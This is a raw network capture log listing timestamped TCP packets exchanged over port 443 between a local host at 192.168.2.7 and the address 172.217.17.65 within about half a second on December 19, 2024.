Dec 19, 2024 10:29:59.547445059 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.547508001 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.552136898 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.552202940 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.552393913 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.552455902 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.555860996 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.555928946 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.556113005 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.556174040 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.567853928 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.567953110 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.568036079 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.568146944 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.568156958 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.568218946 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.592421055 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.592504978 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.592601061 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.592673063 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.598838091 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.598906040 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.599086046 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.599154949 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.601594925 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.601721048 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.603478909 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.603538036 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.610043049 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.610125065 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.610172033 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.610244989 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.619893074 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.619978905 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.620022058 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.620078087 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.630023003 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.630110025 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.630270004 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.630322933 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.640249968 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.640357018 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.640422106 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.640497923 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.650369883 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.650446892 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.650532961 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.650583982 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.661859989 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.661916018 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.662172079 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.662215948 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.668951035 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.668999910 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.669188976 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.669234037 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.678000927 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.678061962 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.678148985 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.678209066 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.686688900 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.686748028 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.686853886 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.686894894 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.686908960 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.687025070 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.688122034 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.688225985 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.695453882 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.695521116 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.696717024 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.696759939 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.712456942 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.712518930 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.713622093 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.713666916 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.714304924 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.714354038 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.717046022 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.717148066 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.717684031 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.717739105 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.720423937 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.720473051 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.722906113 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.722963095 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.724173069 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.724230051 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.729331970 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.729377985 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.730540037 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.730591059 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.737530947 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.737596035 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.738570929 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.738626957 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.742116928 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.742167950 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.748292923 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.748347998 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.749583960 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.749634027 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.749742985 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.749792099 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.752526999 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.752576113 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.754452944 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.754504919 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.757852077 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.757905960 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.759054899 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.759108067 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.762943029 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.762995005 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.763150930 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.763201952 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.768047094 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.768105030 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.768269062 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.768317938 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.784362078 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.784543037 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.784570932 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.784626007 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.785645962 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.785706997 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.788284063 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.788362980 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.790736914 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.790792942 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.790956974 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.791021109 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.791902065 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.791954041 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.792253971 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.792309046 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.794558048 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.794619083 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.795115948 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.795171976 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.798989058 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.799045086 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.799174070 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.799225092 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.803900003 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.803956032 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.804095030 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.804147959 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.808888912 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.808947086 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.809232950 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.809286118 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.813961029 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.814014912 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.814361095 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.814413071 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.818690062 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.818743944 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.818897009 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.818945885 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.823648930 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.823699951 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.823895931 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.823954105 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.828161001 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.828222990 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.828320026 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.828380108 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.832736015 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.832835913 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.832962036 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.833015919 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.837603092 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.837707996 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.837806940 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.837863922 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.842240095 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.842299938 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.842535973 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.842591047 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.846914053 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.846976995 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.847192049 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.847246885 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.851932049 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.852005005 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.852174997 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.852233887 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.856209993 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.856271029 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.856427908 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.856479883 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.860955000 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.861012936 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.861188889 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.861393929 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.865227938 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.865315914 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.865437984 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.865492105 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.870145082 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.870203972 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.870342970 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.870444059 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.873888969 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.873950005 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.874175072 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.874311924 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.874326944 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.874388933 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.878778934 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.878839016 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.878938913 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.878993988 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.882627964 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.882683992 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.882981062 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.883038044 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.887264013 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.887324095 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.887489080 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.887541056 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.890958071 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.891020060 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.891174078 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.891225100 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.895590067 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.895642996 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.895812035 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.895868063 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.899229050 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.899295092 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.899485111 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.899537086 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.903350115 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.903408051 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.903593063 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.903644085 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.907968998 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.908024073 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.908256054 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.908309937 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.911190033 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.911243916 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.911415100 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.911468983 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.915904045 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.915961027 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.916132927 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.916186094 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.918618917 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.918678999 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.918849945 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.918905973 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.922399044 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.922455072 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.922648907 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.922703028 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.926467896 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.926521063 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.926795006 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.926850080 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.930649996 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.930705070 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.930870056 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.930928946 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.933537006 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.933588028 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.933867931 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.933913946 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.937515974 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.937580109 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.937724113 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.937777996 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.940270901 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.940326929 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.940478086 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.940532923 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.943561077 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.943618059 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.943743944 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.943835974 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.946860075 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.946916103 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.947053909 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.947104931 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.950028896 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.950083971 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.950193882 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.950244904 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.953342915 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.953401089 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.953480959 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.953536987 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.956213951 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.956468105 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.956480026 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.956537008 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.959462881 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.959527969 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.959749937 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.959805012 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.962429047 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.962486029 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.962584019 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.962639093 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.965717077 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.965796947 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.965903044 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.965951920 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.976583004 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.976684093 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.976732969 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.976886988 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.978125095 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.978174925 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.978184938 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.978235006 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.978790998 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.978842020 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.979104996 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.979154110 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.982862949 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.982945919 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.983172894 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.983226061 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.983396053 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.983452082 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.984339952 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.984405994 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.984590054 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.984639883 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.985542059 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.985608101 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.985760927 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.985807896 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.985816956 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.985862017 CET	443	49711	172.217.17.65	192.168.2.7
Dec 19, 2024 10:29:59.985866070 CET	49711	443	192.168.2.7	172.217.17.65
Dec 19, 2024 10:29:59.985912085 CET	49711	443	192.168.2.7	172.217.17.65
